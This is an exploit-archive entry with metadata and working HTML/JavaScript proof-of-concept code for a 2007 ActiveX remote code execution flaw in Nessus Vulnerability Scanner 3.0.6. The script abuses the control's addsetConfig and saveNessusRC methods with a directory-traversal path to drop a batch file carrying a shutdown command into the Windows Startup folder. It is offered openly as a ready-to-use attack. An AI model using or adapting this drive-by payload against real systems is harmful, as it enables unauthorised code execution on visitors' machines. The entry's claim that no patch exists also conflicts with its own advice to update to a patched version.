Vendor: Nessus Vulnerability Scanner
By: Krystian Kloskowski (h07)
CVSS: 7.5 (HIGH)
Vulnerability Type: Remote Code Execution
Product Name: Nessus Vulnerability Scanner
Affected Version From: 3.0.6
Affected Version To: 3.0.6
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows XP SP2
Year: 2007

Nessus Vulnerability Scanner 3.0.6 ActiveX 0day Remote Code Execution Exploit

This exploit achieves remote code execution on systems running Nessus Vulnerability Scanner 3.0.6 through the ActiveX control the scanner installs, which a web page can instantiate in Internet Explorer. The bug was discovered by Krystian Kloskowski (h07) and was tested on Nessus 3.0.6 with IE 6 on Windows XP SP2 (Polish). The proof of concept uses the control's addsetConfig method to store a command that shuts down the system with a delay of 1000 milliseconds and displays the message 'hello world ;]', then calls saveNessusRC with a directory-traversal path to write the configuration out as 'exec.bat' in the All Users Startup folder.

Mitigation:

Update to a patched version of Nessus Vulnerability Scanner.

Exploit-DB raw data:

<HTML>
<!--
Nessus Vulnerability Scanner 3.0.6 ActiveX 0day Remote Code Execution Exploit
Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
Tested on Nessus 3.0.6 / IE 6 / XP SP2 Polish
Just for fun ;]
-->

<object id="obj" classid="clsid:A47D5315-321D-4DEE-9DB3-18438023193B"></object>

<script language="javascript">
obj.addsetConfig('shutdown -t 1000 -s -c "hello world ;]" && pause', '', '');
obj.saveNessusRC("../../../../../../Documents and Settings/All Users/Menu Start/Programy/Autostart/exec.bat");
</script>
</HTML>

# milw0rm.com [2007-07-27]